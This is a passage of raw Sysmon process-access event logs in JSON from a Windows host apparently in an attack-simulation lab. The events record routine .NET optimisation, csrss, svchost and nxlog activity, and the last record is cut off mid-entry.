{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7412,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:53.543\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-0010FB360B00}\r\nTargetProcessId: 5064\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:53.543","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-0010FB360B00}","TargetProcessId":"5064","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7413,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:53.574\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12F1-5F25-0000-00106B930A00}\r\nTargetProcessId: 3468\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:53.574","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12F1-5F25-0000-00106B930A00}","TargetProcessId":"3468","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7414,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:53.574\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12F1-5F25-0000-00106B930A00}\r\nTargetProcessId: 3468\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:53.574","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12F1-5F25-0000-00106B930A00}","TargetProcessId":"3468","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7415,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:53.590\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-00107B3A0B00}\r\nTargetProcessId: 3468\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:53.590","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-00107B3A0B00}","TargetProcessId":"3468","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7416,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:53.621\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-0010DA3D0B00}\r\nTargetProcessId: 3288\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:53.621","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-0010DA3D0B00}","TargetProcessId":"3288","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7417,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:53.621\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-0010DA3D0B00}\r\nTargetProcessId: 3288\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:53.621","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-0010DA3D0B00}","TargetProcessId":"3288","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7418,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:53.621\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:53.621","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7419,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:53.621\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-0010DA3D0B00}\r\nTargetProcessId: 3288\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 